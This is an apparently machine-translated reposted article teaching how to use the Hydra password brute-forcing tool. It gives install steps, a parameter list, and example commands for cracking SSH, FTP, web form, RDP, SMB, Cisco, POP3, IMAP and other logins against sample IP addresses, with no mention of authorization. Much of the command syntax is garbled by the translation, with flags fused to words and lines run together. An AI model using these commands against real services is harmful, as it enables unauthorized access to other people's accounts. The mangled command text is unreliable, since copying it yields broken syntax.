Shulou(Shulou.com)06/01 Report--

I. brief introduction

Hydra is an open source brute force password cracking tool of the well-known thc organization, which can crack a variety of passwords online.

Official website: http://www.thc.org/thc-hydra Can support AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, Rsh, SAP/R3, SAP/R3, SIP, SMB SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP and other types of passwords.

II. Installation

Hydra installation

# wget-no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz# tar zxvf hydra-8.1.tar.gz # cd hydra-8.1 #. / configure # make & & make install III. Parameter description: hydra [- l LOGIN |-L FILE] [- p PASS |-P FILE]] | [- C FILE]] [- e ns] [- o FILE] [- t TASKS] [- M FILE [- T TASKS]] [- w TIME] [- f] [- s PORT] [- S] [- vV] server service [OPT]-R continues to crack from the previous progress. -S uses SSL links. -s PORT can specify a non-default port through this parameter. -l LOGIN specifies the user to crack, to crack for specific users. -L FILE specifies the username dictionary. -p PASS lowercase, specify password cracking, use less, generally use password dictionary. -P FILE uppercase, specify password dictionary. -e ns optional, n: empty password trial, s: use specified user and password to explore. -C FILE uses a colon-splitting format, such as "login: password" instead of the-LUnip parameter. -M FILE specifies one line for the target list file. -o FILE specifies the result output file. -f aborts cracking when the first pair of logins or passwords are found after using the-M parameter. -t the number of threads TASKS is running at the same time. The default is 16. -w TIME sets the maximum timeout time (in seconds). The default is 30s. -v /-V shows the detailed process. The server target ip service specifies the service name, supported services and protocols: telnet ftp pop3 [- ntlm] imap [- ntlm] smb smbnt http- {head | get} http- {get | post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth [- ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, and so on. OPT is optional

IV. Examples of various uses:

1. Break ssh: hydra-l username-p password dictionary-t thread-vV-e ns ip ssh hydra-l username-p password dictionary-t thread-o save.log-vV ip ssh 2, crack ftp: hydra ip ftp-l username-P password dictionary-t thread (default 16)-vV hydra ip ftp-l user name-P password dictionary-e ns-vV 3, submit by get Crack web login: hydra-l username-p password dictionary-t thread-vV-e ns ip http-get / admin/ hydra-l user name-p password dictionary-t thread-vV-e ns-f ip http-get / admin/index.php4, submit by post Crack web login: hydra-l username-P password dictionary-s 80 ip http-post-form "/ admin/login.php:username= ^ user ^ & password= ^ pass ^ & submit=login:sorry password" hydra-t 3-l admin-P pass.txt-o out.txt-f 10.36.16.18 http-post-form "login.php:id= ^ user ^ & passwd= ^ password ^: wrong username or password" (parameter description:-t simultaneous threads 3 login.php:id= user name admin, dictionary pass.txt, save as out.txt -f stop when a password is cracked. 10.36.16.18 target ip,http-post-form indicates that cracking is a form password cracking submitted by http's post mode, and the content is a return message indicating an erroneous guess. ) 5. Crack https: hydra-m / index.php-l muts-P pass.txt 10.36.16.18 https 6, crack teamspeak: hydra-l username-P password dictionary-s port number-vV ip teamspeak 7, crack cisco: hydra-P pass.txt 10.36.16.18 cisco hydra-m cloud-P pass.txt 10.36.16.18 cisco-enable 8, crack smb: hydra-l administrator-P pass.txt 10.36.16.18 smb 9, Crack pop3: hydra-l muts-P pass.txt my.pop3.mail pop3 10, crack rdp: hydra ip rdp-l administrator-P pass.txt-V 11, crack http-proxy: hydra-l admin-P pass.txt http-proxy://10.36.16.18 12, crack imap: hydra-L user.txt-p secret 10.36.16.18 imap PLAIN hydra-C defaults.txt-6 imap:// [fe80::2c:31ff:fe12:ac11]: 143/PLAIN

Attach the download address of the windows version:

Https://github.com/maaaaz/thc-hydra-windows

The article was reproduced at @ Nan GE, author of wooyun

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.